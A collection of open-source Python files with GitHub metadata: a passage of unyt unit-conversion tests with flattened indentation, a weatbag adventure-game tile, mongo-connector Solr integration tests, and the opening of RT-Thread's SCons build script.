assert_allclose_units(
u1.get_conversion_factor(u3)[0], Msun_mks / Mpc_mks**3, 1e-12
)
with pytest.raises(UnitConversionError):
u1.get_conversion_factor(Unit("m"))
with pytest.raises(UnitConversionError):
u1.get_conversion_factor(Unit("degF"))
reg = UnitRegistry(unit_system=cgs_unit_system)
u = Unit("kg", registry=reg)
assert u.get_base_equivalent() == Unit("g")
u = Unit("kg")
assert u.get_base_equivalent() == Unit("kg")
u = Unit("A")
assert u.get_base_equivalent(unit_system="mks") == Unit("A")
def test_temperature_offsets():
u1 = Unit("degC")
u2 = Unit("degF")
with pytest.raises(InvalidUnitOperation):
operator.mul(u1, u2)
with pytest.raises(InvalidUnitOperation):
operator.truediv(u1, u2)
def test_latex_repr():
registry = UnitRegistry()
# create a fake comoving unit
registry.add(
"pccm",
registry.lut["pc"][0] / (1 + 2),
length,
"\\rm{pc}/(1+z)",
prefixable=True,
)
test_unit = Unit("Mpccm", registry=registry)
assert_almost_equal(test_unit.base_value, m_per_mpc / 3)
assert_equal(test_unit.latex_repr, r"\rm{Mpc}/(1+z)")
test_unit = Unit("cm**-3", base_value=1.0, registry=registry)
assert_equal(test_unit.latex_repr, "\\frac{1}{\\rm{cm}^{3}}")
test_unit = Unit("m_geom/l_geom**3")
assert_equal(test_unit.latex_repr, "\\frac{1}{\\rm{M}_\\odot^{2}}")
test_unit = Unit("1e9*cm")
assert_equal(test_unit.latex_repr, "1.0 \\times 10^{9}\\ \\rm{cm}")
test_unit = Unit("1.0*cm")
assert_equal(test_unit.latex_repr, "\\rm{cm}")
def test_latitude_longitude():
lat = unit_symbols.lat
lon = unit_symbols.lon
deg = unit_symbols.deg
assert_equal(lat.units.base_offset, 90.0)
assert_equal((deg * 90.0).in_units("lat").value, 0.0)
assert_equal((deg * 180).in_units("lat").value, -90.0)
assert_equal((lat * 0.0).in_units("deg"), deg * 90.0)
assert_equal((lat * -90).in_units("deg"), deg * 180)
assert_equal(lon.units.base_offset, -180.0)
assert_equal((deg * 0.0).in_units("lon").value, -180.0)
assert_equal((deg * 90.0).in_units("lon").value, -90.0)
assert_equal((deg * 180).in_units("lon").value, 0.0)
assert_equal((deg * 360).in_units("lon").value, 180.0)
assert_equal((lon * -180.0).in_units("deg"), deg * 0.0)
assert_equal((lon * -90.0).in_units("deg"), deg * 90.0)
assert_equal((lon * 0.0).in_units("deg"), deg * 180.0)
assert_equal((lon * 180.0).in_units("deg"), deg * 360)
def test_creation_from_ytarray():
from unyt import electrostatic_unit, elementary_charge_cgs
u1 = Unit(electrostatic_unit)
assert_equal(str(u1), "statC")
assert_equal(u1, Unit("esu"))
assert_equal(u1, electrostatic_unit.units)
u2 = Unit(elementary_charge_cgs)
assert_equal(str(u2), "4.80320467299766e-10*statC")
assert_equal(u2, Unit("4.80320467299766e-10*statC"))
assert_equal(u1, elementary_charge_cgs.units)
assert_allclose((u1 / u2).base_value, electrostatic_unit / elementary_charge_cgs)
with pytest.raises(UnitParseError):
Unit([1, 2, 3] * elementary_charge_cgs)
def test_list_same_dimensions():
from unyt import m
reg = default_unit_registry
for equiv in reg.list_same_dimensions(m):
assert Unit(equiv).dimensions is length
def test_decagram():
    """A decagram converts to exactly ten grams with no offset."""
    factor, offset = Unit("dag").get_conversion_factor(Unit("g"))
    assert factor == 10.0
    assert offset is None
def test_pickle():
    """A Unit survives a pickle round-trip unchanged."""
    original = Unit("cm")
    restored = pickle.loads(pickle.dumps(original))
    assert original == restored
def test_preserve_offset():
from unyt import degF, dimensionless
new_unit = degF * dimensionless
assert new_unit is not degF
assert new_unit == degF
assert new_unit.base_offset == degF.base_offset
new_unit = degF / dimensionless
assert new_unit is not degF
assert new_unit == degF
assert new_unit.base_offset == degF.base_offset
with pytest.raises(InvalidUnitOperation):
dimensionless / degF
def test_code_unit():
from unyt import UnitRegistry
ureg = UnitRegistry()
ureg.add("code_length", 10.0, length)
ureg.add("code_magnetic_field", 2.0, magnetic_field_mks)
u = Unit("code_length", registry=ureg)
assert u.is_code_unit is True
assert u.get_base_equivalent() == Unit("m")
u = Unit("cm")
assert u.is_code_unit is False
u = Unit("code_magnetic_field", registry=ureg)
assert u.get_base_equivalent("mks") == Unit("T")
with pytest.raises(UnitsNotReducible):
assert u.get_base_equivalent("cgs")
# see issue #60
u = Unit("s/m")
assert u.get_mks_equivalent() == Unit("s/m")
assert u.get_mks_equivalent() != Unit("ohm")
assert u.get_cgs_equivalent() == Unit("s/cm")
u = Unit("kC")
assert u.get_cgs_equivalent() == Unit("kesu")
assert u.get_cgs_equivalent().get_mks_equivalent() == u
UnitSystem(ureg.unit_system_id, "code_length", "kg", "s", registry=ureg)
u = Unit("cm", registry=ureg)
ue = u.get_base_equivalent("code")
assert str(ue) == "code_length"
assert ue.base_value == 10
assert ue.dimensions is length
class FakeDataset:
unit_registry = ureg
ds = FakeDataset()
UnitSystem(ds, "code_length", "kg", "s", registry=ureg)
u = Unit("cm", registry=ureg)
ue = u.get_base_equivalent(ds)
assert str(ue) == "code_length"
assert ue.base_value == 10
assert ue.dimensions is length
with pytest.raises(UnitParseError):
Unit("code_length")
def test_bad_equivalence():
from unyt import cm
with pytest.raises(KeyError):
cm.has_equivalent("dne")
def test_em_unit_base_equivalent():
from unyt import A, cm
with pytest.raises(UnitsNotReducible):
(A / cm).get_base_equivalent("cgs")
def test_symbol_lut_length():
    """Every entry in the symbol lookup table carries exactly 5 fields."""
    for entry in default_unit_symbol_lut.values():
        assert len(entry) == 5
def test_simplify():
import unyt as u
answers = {
u.Hz * u.s: "dimensionless",
u.kg / u.g: "1000",
u.Hz * u.s * u.km: "km",
u.kHz * u.s: "1000",
u.kHz * u.s * u.km: "1000*km",
u.kHz * u.s**2: "1000*s",
u.kHz * u.s**2 * u.km: "1000*km*s",
u.Hz**-1 * u.s: "s/Hz",
u.Hz**-1 * u.s * u.km: "km*s/Hz",
u.Hz**1.5 * u.s**1.7: "sqrt(Hz)*s**(7/10)",
u.Hz**1.5 * u.s**1.7 * u.km: "sqrt(Hz)*km*s**(7/10)",
u.m**2 / u.cm**2: "10000",
}
for unit, answer in answers.items():
assert str(unit.simplify()) == answer
def test_micro_prefix():
import unyt as u
# both versions of unicode mu work correctly
assert u.um == u.µm
assert u.um == u.μm
# parsing both versions works as well
assert u.ug == u.Unit("µg")
assert u.ug == u.Unit("μg")
def test_name_alternatives():
import unyt
from unyt._unit_lookup_table import (
default_unit_name_alternatives,
inv_name_alternatives,
name_alternatives,
)
# concatenated list of all alternative unit names
allowed_names = sum(name_alternatives.values(), [])
# ensure the values are all tuples and not e.g. strings
for val in default_unit_name_alternatives.values():
assert isinstance(val, tuple)
# all names are unique
assert len(set(allowed_names)) == len(allowed_names)
# each allowed name has a key in the inverse dict
assert len(inv_name_alternatives.keys()) == len(allowed_names)
assert set(inv_name_alternatives.keys()) == set(allowed_names)
for name in allowed_names:
assert hasattr(unyt, name)
assert hasattr(unyt.unit_symbols, name)
def test_solar_unit_name_alternatives():
import unyt
from unyt import Unit
# check that m_sun, m_Sun, M_sun, M_Sun, msun, and Msun all work
for lower_name_prefix in "mrltz":
base_name = lower_name_prefix + "sun"
for name_prefix in [lower_name_prefix, lower_name_prefix.upper()]:
alternative_names = [name_prefix + suf for suf in ["sun", "_sun", "_Sun"]]
for name in alternative_names:
assert Unit(name) == Unit(base_name)
assert hasattr(unyt, name)
# only solar mass units are in physical constants
if lower_name_prefix == "m":
assert hasattr(unyt.physical_constants, name)
def test_attosecond():
    """'as' parses to attosecond even though 'as' is a Python keyword."""
    from unyt import Unit, attosecond, second

    as_unit = Unit("as")
    assert as_unit == attosecond
    assert str(as_unit) == "as"
    assert Unit("as/s") == attosecond / second
def test_micro():
    """ASCII 'u' prefixes render with the Greek letter mu."""
    from unyt import Unit

    for ascii_name, pretty in (("um", "μm"), ("us", "μs")):
        assert str(Unit(ascii_name)) == pretty
def test_show_all_units_doc_table_ops():
for name in set(name_alternatives.keys()):
u = Unit(name)
(1 * u).in_mks()
try:
(1 * u).in_cgs()
except UnitsNotReducible:
pass
def test_hPa_mbar():
assert Unit("hPa").dimensions == Unit("bar").dimensions
assert (5 * Unit("hPa") == 5 * Unit("mbar")).all()
assert (5 * Unit("hPa") != 1 * Unit("bar")).all()
def test_percent():
a = 300 * Unit("percent")
b = 3.0 * Unit("dimensionless")
c = 300.0 * Unit("%")
d = 300.0 * Unit("V*%/V")
assert a == b
assert str(a) == "300 %"
assert repr(a) == "unyt_quantity(300, '%')"
assert a == c
assert c == d
def test_equal_has_same_hash():
a = Unit("m")
b = Unit("m")
c = Unit("m*s/s")
assert a == b
assert b == c
assert hash(a) == hash(b)
assert hash(b) == hash(c)
def test_bel_neper():
assert Unit("B").dimensions == Unit("Np").dimensions
a = 1 * Unit("B") / (np.log(10) / 2)
assert_allclose_units(a.to("Np"), 1 * Unit("Np"))
a = 2 * Unit("B")
b = 20 * Unit("decibel")
assert (a == b).all()
c = 2 * Unit("Np")
d = 20 * Unit("decineper")
assert (c == d).all()
assert Unit("dB") ** 1 == Unit("dB")
def test_henry():
    """Inductance divided by resistance has dimensions of time (L/R)."""
    ratio = Unit("H") / Unit("Ω")
    assert ratio.dimensions == time
def test_degC():
assert Unit("degree_celsius") == Unit("degC")
assert Unit("degree_Celsius") == Unit("degC")
assert Unit("Celsius") == Unit("degC")
assert Unit("°C") == Unit("degC")
a = 1 * Unit("degC")
assert str(a) == "1 °C"
def test_degC_with_SIprefixes():
assert_allclose_units(1 * Unit("mdegC"), 0.001 * Unit("degC"))
assert_allclose_units(1 * Unit("degC"), 1000 * Unit("mdegC"))
assert_allclose_units(73 * Unit("degF"), 22777.779 * Unit("mdegC"))
assert_allclose_units(22777.779 * Unit("mdegC"), 73 * Unit("degF"))
assert_allclose_units(22777.779 * Unit("mdegC"), 532.67 * Unit("R"))
assert_allclose_units(1 * Unit("mK"), -273149.0 * Unit("mdegC"))
assert_allclose_units(1 * Unit("mdegC"), 273151.0 * Unit("mK"))
def test_delta_degC():
a = 1 * Unit("delta_degC")
assert str(a) == "1 Δ°C"
def test_degF():
assert Unit("degree_fahrenheit") == Unit("degF")
assert Unit("degree_Fahrenheit") == Unit("degF")
assert Unit("Fahrenheit") == Unit("degF")
assert Unit("°F") == Unit("degF")
a = 1 * Unit("degF")
assert str(a) == "1 °F"
def test_delta_degF():
a = 1 * Unit("delta_degF")
assert str(a) == "1 Δ°F"
def test_mixed_registry_operations():
reg = UnitRegistry(unit_system="cgs")
reg.add("fake_length", 0.001, length)
a = unyt_quantity(1, units="fake_length", registry=reg)
b = unyt_quantity(1, "cm")
assert_almost_equal(a + b, b + a)
assert_almost_equal(a - b, -(b - a))
assert_almost_equal(a * b, b * a)
assert_almost_equal(b / a, b / a.in_units("km"))
assert_almost_equal(a / b, a / b.in_units("km"))
| {
"content_hash": "66d59405b2ee635881a07adf43c62b65",
"timestamp": "",
"source": "github",
"line_count": 905,
"max_line_length": 88,
"avg_line_length": 26.029834254143648,
"alnum_prop": 0.5981236999617948,
"repo_name": "yt-project/unyt",
"id": "3ba67c508c857aaa0c10810e71f03cd24c3443b9",
"size": "23572",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "unyt/tests/test_units.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "463795"
},
{
"name": "TeX",
"bytes": "10958"
}
],
"symlink_target": ""
} |
from weatbag import words
class Tile:
    """Island beach tile: a longer greeting on the first visit, a short
    idle message afterwards."""

    def __init__(self):
        self.first_visit = True

    def describe(self):
        """Print the tile description; the long version only once."""
        if not self.first_visit:
            print("The beach is quiet. Nothing seems to be going on.")
            return
        self.first_visit = False
        print("You are now on the island. The children are returning back "
              "to the mainland with their raft.\n"
              "In front of you there are some trees and a small path.\n"
              "Feeling adventurous?\n")

    def action(self, player, do):
        """React to the player's first word: yes, no, or anything else."""
        verb = do[0]
        if verb in words.yes:
            print("Awesome! Follow the path!")
        elif verb in words.no:
            print("You might be in the wrong place then. Pack your stuff and "
                  "quit the game.")
        else:
            print("Sorry, wat?!")

    def leave(self, player, direction):
        """Allow movement in every direction except east (back to sea)."""
        if direction != "e":
            return True
        print("You can't go back by swimming, that part is full of "
              "electric eels.")
        return False
| {
"content_hash": "2012b207101cab6a7cd14ff562c8aa64",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 33.65625,
"alnum_prop": 0.532033426183844,
"repo_name": "takluyver/weatbag",
"id": "35897c3f40fe0bc3f2463b75e2ed0bb14cbee6ec",
"size": "1077",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "weatbag/tiles/n2w2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63868"
}
],
"symlink_target": ""
} |
"""Test Solr search using the synchronizer, i.e. as it would be used by an user
"""
import logging
import os
import time
import sys
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
else:
import unittest
sys.path[0:0] = [""]
from pymongo import MongoClient
from tests import solr_pair, mongo_host, STRESS_COUNT
from tests.setup_cluster import (start_replica_set,
kill_replica_set,
restart_mongo_proc,
kill_mongo_proc)
from tests.util import assert_soon
from pysolr import Solr, SolrError
from mongo_connector.connector import Connector
from mongo_connector.util import retry_until_ok
from pymongo.errors import OperationFailure, AutoReconnect
class TestSynchronizer(unittest.TestCase):
""" Tests Solr
"""
@classmethod
def setUpClass(cls):
_, cls.secondary_p, cls.primary_p = start_replica_set('test-solr')
cls.conn = MongoClient(mongo_host, cls.primary_p,
replicaSet='test-solr')
cls.solr_conn = Solr('http://%s/solr' % solr_pair)
cls.solr_conn.delete(q='*:*')
@classmethod
def tearDownClass(cls):
""" Kills cluster instance
"""
kill_replica_set('test-solr')
def setUp(self):
try:
os.unlink("config.txt")
except OSError:
pass
open("config.txt", "w").close()
self.connector = Connector(
address='%s:%s' % (mongo_host, self.primary_p),
oplog_checkpoint='config.txt',
target_url='http://localhost:8983/solr',
ns_set=['test.test'],
u_key='_id',
auth_key=None,
doc_manager='mongo_connector/doc_managers/solr_doc_manager.py',
auto_commit_interval=0
)
self.connector.start()
assert_soon(lambda: len(self.connector.shard_set) > 0)
retry_until_ok(self.conn.test.test.remove)
assert_soon(lambda: len(self.solr_conn.search('*:*')) == 0)
def tearDown(self):
self.connector.join()
def test_shard_length(self):
"""Tests the shard_length to see if the shard set was recognized
"""
self.assertEqual(len(self.connector.shard_set), 1)
def test_insert(self):
"""Tests insert
"""
self.conn['test']['test'].insert({'name': 'paulie'})
while (len(self.solr_conn.search('*:*')) == 0):
time.sleep(1)
result_set_1 = self.solr_conn.search('paulie')
self.assertEqual(len(result_set_1), 1)
result_set_2 = self.conn['test']['test'].find_one()
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
self.assertEqual(item['name'], result_set_2['name'])
def test_remove(self):
"""Tests remove
"""
self.conn['test']['test'].insert({'name': 'paulie'})
assert_soon(lambda: len(self.solr_conn.search("*:*")) == 1)
self.conn['test']['test'].remove({'name': 'paulie'})
assert_soon(lambda: len(self.solr_conn.search("*:*")) == 0)
def test_rollback(self):
"""Tests rollback. We force a rollback by inserting one doc, killing
primary, adding another doc, killing the new primary, and
restarting both the servers.
"""
primary_conn = MongoClient(mongo_host, self.primary_p)
self.conn['test']['test'].insert({'name': 'paul'})
while self.conn['test']['test'].find({'name': 'paul'}).count() != 1:
time.sleep(1)
while len(self.solr_conn.search('*:*')) != 1:
time.sleep(1)
kill_mongo_proc(self.primary_p, destroy=False)
new_primary_conn = MongoClient(mongo_host, self.secondary_p)
admin_db = new_primary_conn['admin']
while admin_db.command("isMaster")['ismaster'] is False:
time.sleep(1)
time.sleep(5)
retry_until_ok(self.conn.test.test.insert,
{'name': 'pauline'})
while (len(self.solr_conn.search('*:*')) != 2):
time.sleep(1)
result_set_1 = self.solr_conn.search('pauline')
result_set_2 = self.conn['test']['test'].find_one({'name': 'pauline'})
self.assertEqual(len(result_set_1), 1)
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
kill_mongo_proc(self.secondary_p, destroy=False)
restart_mongo_proc(self.primary_p)
while primary_conn['admin'].command("isMaster")['ismaster'] is False:
time.sleep(1)
restart_mongo_proc(self.secondary_p)
time.sleep(2)
result_set_1 = self.solr_conn.search('pauline')
self.assertEqual(len(result_set_1), 0)
result_set_2 = self.solr_conn.search('paul')
self.assertEqual(len(result_set_2), 1)
def test_stress(self):
    """Test stress by inserting and removing a large amount of docs.
    """
    #stress test
    for i in range(0, STRESS_COUNT):
        self.conn['test']['test'].insert({'name': 'Paul ' + str(i)})
    time.sleep(5)
    # Poll until all inserts have replicated to Solr.
    while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT))
            != STRESS_COUNT):
        time.sleep(5)
    for i in range(0, STRESS_COUNT):
        result_set_1 = self.solr_conn.search('Paul ' + str(i))
        for item in result_set_1:
            # NOTE(review): this compares item['_id'] to itself and can
            # never fail — presumably it was meant to compare the Solr
            # _id against the MongoDB _id; confirm intent upstream.
            self.assertEqual(item['_id'], item['_id'])
def test_stressed_rollback(self):
    """Test stressed rollback with a large number of documents"""
    for i in range(0, STRESS_COUNT):
        self.conn['test']['test'].insert(
            {'name': 'Paul ' + str(i)})
    # Wait until every 'Paul' document is visible in Solr.
    while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT))
            != STRESS_COUNT):
        time.sleep(1)
    primary_conn = MongoClient(mongo_host, self.primary_p)
    # Kill the primary; the secondary should be elected in its place.
    kill_mongo_proc(self.primary_p, destroy=False)

    new_primary_conn = MongoClient(mongo_host, self.secondary_p)
    admin_db = new_primary_conn['admin']
    while admin_db.command("isMaster")['ismaster'] is False:
        time.sleep(1)
    time.sleep(5)
    count = -1
    # Insert 'Pauline' docs against the new primary, retrying through
    # transient failover errors.  NOTE(review): count is incremented
    # before the insert, so a failed insert permanently skips that
    # sequence number rather than retrying it — confirm this is intended.
    while count + 1 < STRESS_COUNT:
        try:
            count += 1
            self.conn['test']['test'].insert(
                {'name': 'Pauline ' + str(count)})
        except (OperationFailure, AutoReconnect):
            time.sleep(1)
    # Wait until Solr and MongoDB agree on the document count.
    while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT * 2)) !=
            self.conn['test']['test'].find().count()):
        time.sleep(1)
    result_set_1 = self.solr_conn.search(
        'Pauline',
        rows=STRESS_COUNT * 2, sort='_id asc'
    )
    for item in result_set_1:
        result_set_2 = self.conn['test']['test'].find_one(
            {'name': item['name']})
        self.assertEqual(item['_id'], str(result_set_2['_id']))

    # Kill the new primary and restart the old one first so the
    # 'Pauline' writes get rolled back during reconciliation.
    kill_mongo_proc(self.secondary_p, destroy=False)
    restart_mongo_proc(self.primary_p)
    while primary_conn['admin'].command("isMaster")['ismaster'] is False:
        time.sleep(1)
    restart_mongo_proc(self.secondary_p)

    # Wait for the rollback to propagate to Solr.
    while (len(self.solr_conn.search(
            'Pauline',
            rows=STRESS_COUNT * 2)) != 0):
        time.sleep(15)
    result_set_1 = self.solr_conn.search(
        'Pauline',
        rows=STRESS_COUNT * 2
    )
    self.assertEqual(len(result_set_1), 0)
    # Only the original 'Paul' documents should remain.
    result_set_2 = self.solr_conn.search(
        'Paul',
        rows=STRESS_COUNT * 2
    )
    self.assertEqual(len(result_set_2), STRESS_COUNT)
def test_valid_fields(self):
    """ Tests documents with field definitions

    A field that is declared in the Solr schema ('popularity') must be
    indexed and preserved on the replicated document.
    """
    inserted_obj = self.conn['test']['test'].insert(
        {'name': 'test_valid'})
    self.conn['test']['test'].update(
        {'_id': inserted_obj},
        {'$set': {'popularity': 1}}
    )

    docman = self.connector.doc_managers[0]
    # Give the connector up to ~60 seconds to replicate the document.
    for _ in range(60):
        if len(docman._search("*:*")) != 0:
            break
        time.sleep(1)
    else:
        self.fail("Timeout when removing docs from Solr")

    result = docman.get_last_doc()
    self.assertIn('popularity', result)
    self.assertEqual(len(docman._search(
        "name=test_valid")), 1)
def test_invalid_fields(self):
    """ Tests documents without field definitions

    A field that is not declared in the Solr schema
    ('break_this_test') must be dropped from the replicated document.
    """
    inserted_obj = self.conn['test']['test'].insert(
        {'name': 'test_invalid'})
    self.conn['test']['test'].update(
        {'_id': inserted_obj},
        {'$set': {'break_this_test': 1}}
    )

    docman = self.connector.doc_managers[0]
    # Give the connector up to ~60 seconds to replicate the document.
    for _ in range(60):
        if len(docman._search("*:*")) != 0:
            break
        time.sleep(1)
    else:
        self.fail("Timeout when removing docs from Solr")

    result = docman.get_last_doc()
    self.assertNotIn('break_this_test', result)
    self.assertEqual(len(docman._search(
        "name=test_invalid")), 1)
def test_dynamic_fields(self):
    """ Tests dynamic field definitions

    The following fields are supplied in the provided schema.xml:
    <dynamicField name="*_i" type="int" indexed="true" stored="true"/>
    <dynamicField name="i_*" type="int" indexed="true" stored="true"/>

    Cases:
    1. Match on first definition
    2. Match on second definition
    3. No match
    """
    # Start from an empty index so the counts below are exact.
    self.solr_conn.delete(q='*:*')

    match_first = {"_id": 0, "foo_i": 100}
    match_second = {"_id": 1, "i_foo": 200}
    match_none = {"_id": 2, "foo": 300}

    # Connector is already running
    self.conn["test"]["test"].insert(match_first)
    self.conn["test"]["test"].insert(match_second)
    self.conn["test"]["test"].insert(match_none)

    # Should have documents in Solr now
    assert_soon(lambda: len(self.solr_conn.search("*:*")) > 0,
                "Solr doc manager should allow dynamic fields")

    # foo_i and i_foo should be indexed, foo field should not exist
    self.assertEqual(len(self.solr_conn.search("foo_i:100")), 1)
    self.assertEqual(len(self.solr_conn.search("i_foo:200")), 1)

    # SolrError: "undefined field foo"
    logger = logging.getLogger("pysolr")
    logger.error("You should see an ERROR log message from pysolr here. "
                 "This indicates success, not an error in the test.")
    with self.assertRaises(SolrError):
        self.solr_conn.search("foo:300")
def test_nested_fields(self):
    """Test indexing fields that are sub-documents in MongoDB

    The following fields are defined in the provided schema.xml:

    <field name="person.address.street" type="string" ... />
    <field name="person.address.state" type="string" ... />
    <dynamicField name="numbers.*" type="string" ... />
    <dynamicField name="characters.*" type="string" ... />

    Sub-documents and array elements are flattened into dotted field
    names ('billing.address.state', 'numbers.2', 'characters.1.color').
    """
    # Connector is already running
    self.conn["test"]["test"].insert({
        "name": "Jeb",
        "billing": {
            "address": {
                "street": "12345 Mariposa Street",
                "state": "California"
            }
        }
    })
    self.conn["test"]["test"].insert({
        "numbers": ["one", "two", "three"],
        "characters": [
            {"name": "Big Bird",
             "color": "yellow"},
            {"name": "Elmo",
             "color": "red"},
            "Cookie Monster"
        ]
    })

    assert_soon(lambda: len(self.solr_conn.search("*:*")) > 0,
                "documents should have been replicated to Solr")

    # Search for first document
    results = self.solr_conn.search(
        "billing.address.street:12345\ Mariposa\ Street")
    self.assertEqual(len(results), 1)
    self.assertEqual(next(iter(results))["billing.address.state"],
                     "California")

    # Search for second document
    results = self.solr_conn.search(
        "characters.1.color:red")
    self.assertEqual(len(results), 1)
    self.assertEqual(next(iter(results))["numbers.2"], "three")

    results = self.solr_conn.search("characters.2:Cookie\ Monster")
    self.assertEqual(len(results), 1)
# Run the integration test suite when executed as a script.
if __name__ == '__main__':
    unittest.main()
| {
"content_hash": "a89883ab1cc1bb4f34ecec02099f9e05",
"timestamp": "",
"source": "github",
"line_count": 358,
"max_line_length": 79,
"avg_line_length": 35.29608938547486,
"alnum_prop": 0.5450300728078505,
"repo_name": "wowgeeker/mongo-connector",
"id": "381bcf7b5ab26936af6b4adb5dc747de11856352",
"size": "13215",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/test_solr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import os
import sys
import string
import utils
from SCons.Script import *
from utils import _make_path_relative
from mkdist import do_copy_file
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
# SCons PreProcessor patch
def start_handling_includes(self, t=None):
    """
    Causes the PreProcessor object to start processing #import,
    #include and #include_next lines.

    The handlers are restored from the table of the innermost open
    conditional block, falling back to the default table when no block
    is open.  Called when a #if, #ifdef, #ifndef or #elif evaluates
    True, or at the #else of a block whose condition already evaluated
    False.
    """
    if self.stack:
        source_table = self.stack[-1]
    else:
        source_table = self.default_table
    for directive in ('import', 'include', 'include_next', 'define'):
        self.dispatch_table[directive] = source_table[directive]
def stop_handling_includes(self, t=None):
    """
    Causes the PreProcessor object to stop processing #import,
    #include and #include_next lines.

    Every include-like directive (plus #define) is routed to the no-op
    handler.  Called when a #if, #ifdef, #ifndef or #elif evaluates
    False, or at the #else of a block whose condition already evaluated
    True.
    """
    for directive in ('import', 'include', 'include_next', 'define'):
        self.dispatch_table[directive] = self.do_nothing
# Monkey-patch SCons' C preprocessor with the handlers defined above so
# that parsing rtconfig.h honours #if/#ifdef conditional compilation.
PatchedPreProcessor = SCons.cpp.PreProcessor
PatchedPreProcessor.start_handling_includes = start_handling_includes
PatchedPreProcessor.stop_handling_includes = stop_handling_includes
class Win32Spawn:
    """SPAWN replacement for SCons on Windows.

    Works around two problems: cmd.exe built-ins (such as 'del') cannot
    be started through subprocess.Popen, and CreateProcess does not use
    the env passed to it to locate executables, so our own PATH must be
    patched before spawning.
    """

    def spawn(self, sh, escape, cmd, args, env):
        # deal with the cmd build-in commands which cannot be used in
        # subprocess.Popen
        if cmd == 'del':
            for f in args[1:]:
                try:
                    os.remove(f)
                except Exception as e:
                    # BUG FIX: the original concatenated the exception
                    # object itself to a str, which raises TypeError.
                    print ('Error removing file: ' + str(e))
                    return -1
            return 0

        import subprocess

        newargs = ' '.join(args[1:])
        cmdline = cmd + " " + newargs

        # Make sure the env is constructed by strings
        _e = dict([(k, str(v)) for k, v in env.items()])

        # Windows(tm) CreateProcess does not use the env passed to it to
        # find the executables. So we have to modify our own PATH to
        # make Popen work.
        old_path = os.environ['PATH']
        os.environ['PATH'] = _e['PATH']

        try:
            proc = subprocess.Popen(cmdline, env=_e, shell=False)
        except Exception as e:
            print ('Error in calling command:' + cmdline.split(' ')[0])
            # Not every exception carries an errno (e.g. TypeError), so
            # guard before asking os.strerror for a message.
            err = getattr(e, 'errno', None)
            reason = os.strerror(err) if err is not None else str(e)
            print ('Exception: ' + reason)
            if (reason == "No such file or directory"):
                print ("\nPlease check Toolchains PATH setting.\n")
            return err if err is not None else -1
        finally:
            # Always restore PATH, even when Popen raised.
            os.environ['PATH'] = old_path

        return proc.wait()
# generate cconfig.h file
def GenCconfigFile(env, BuildOptions):
    """Generate (when missing) and parse 'cconfig.h' for GCC builds.

    Macros found in cconfig.h are merged into *BuildOptions* and the
    HAVE_CCONFIG_H define is appended to the construction environment.
    Non-GCC platforms are left untouched.
    """
    import rtconfig

    if rtconfig.PLATFORM != 'gcc':
        return

    if not os.path.isfile('cconfig.h'):
        # Probe the GCC toolchain once to produce cconfig.h.
        import gcc
        gcc.GenerateGCCConfig(rtconfig)

    # try again
    if os.path.isfile('cconfig.h'):
        # Use a context manager so the handle is always closed (the
        # original left the file open and tested the always-true 'if f:').
        with open('cconfig.h', 'r') as f:
            contents = f.read()

        prep = PatchedPreProcessor()
        prep.process_contents(contents)
        options = prep.cpp_namespace

        BuildOptions.update(options)

        # add HAVE_CCONFIG_H definition
        env.AppendUnique(CPPDEFINES = ['HAVE_CCONFIG_H'])
def PrepareBuilding(env, root_directory, has_libcpu=False, remove_components = []):
    """Prepare the SCons build for a BSP.

    Registers all RT-Thread command-line options, selects and configures
    the toolchain, parses rtconfig.h into the global BuildOptions, and
    collects the object lists from the BSP, kernel, libcpu and
    components SConscripts.

    :param env: SCons construction environment to configure.
    :param root_directory: path of the RT-Thread source tree root.
    :param has_libcpu: when True the BSP provides its own libcpu and the
        shared one is skipped.
    :param remove_components: component directories to exclude from the
        build.  NOTE(review): mutable default argument — safe only while
        no callee mutates it.
    :return: list of SCons objects to pass to DoBuilding().
    """
    import rtconfig

    global BuildOptions
    global Projects
    global Env
    global Rtt_Root

    # ===== Add option to SCons =====
    AddOption('--dist',
              dest = 'make-dist',
              action = 'store_true',
              default = False,
              help = 'make distribution')
    AddOption('--dist-strip',
              dest = 'make-dist-strip',
              action = 'store_true',
              default = False,
              help = 'make distribution and strip useless files')
    AddOption('--dist-ide',
              dest = 'make-dist-ide',
              action = 'store_true',
              default = False,
              help = 'make distribution for RT-Thread Studio IDE')
    AddOption('--project-path',
              dest = 'project-path',
              type = 'string',
              default = None,
              help = 'set dist-ide project output path')
    AddOption('--project-name',
              dest = 'project-name',
              type = 'string',
              default = None,
              help = 'set project name')
    AddOption('--reset-project-config',
              dest = 'reset-project-config',
              action = 'store_true',
              default = False,
              help = 'reset the project configurations to default')
    AddOption('--cscope',
              dest = 'cscope',
              action = 'store_true',
              default = False,
              help = 'Build Cscope cross reference database. Requires cscope installed.')
    AddOption('--clang-analyzer',
              dest = 'clang-analyzer',
              action = 'store_true',
              default = False,
              help = 'Perform static analyze with Clang-analyzer. ' + \
                   'Requires Clang installed.\n' + \
                   'It is recommended to use with scan-build like this:\n' + \
                   '`scan-build scons --clang-analyzer`\n' + \
                   'If things goes well, scan-build will instruct you to invoke scan-view.')
    AddOption('--buildlib',
              dest = 'buildlib',
              type = 'string',
              help = 'building library of a component')
    AddOption('--cleanlib',
              dest = 'cleanlib',
              action = 'store_true',
              default = False,
              help = 'clean up the library by --buildlib')
    AddOption('--target',
              dest = 'target',
              type = 'string',
              help = 'set target project: mdk/mdk4/mdk5/iar/vs/vsc/ua/cdk/ses/makefile/eclipse')
    AddOption('--genconfig',
              dest = 'genconfig',
              action = 'store_true',
              default = False,
              help = 'Generate .config from rtconfig.h')
    AddOption('--useconfig',
              dest = 'useconfig',
              type = 'string',
              help = 'make rtconfig.h from config file.')
    AddOption('--verbose',
              dest = 'verbose',
              action = 'store_true',
              default = False,
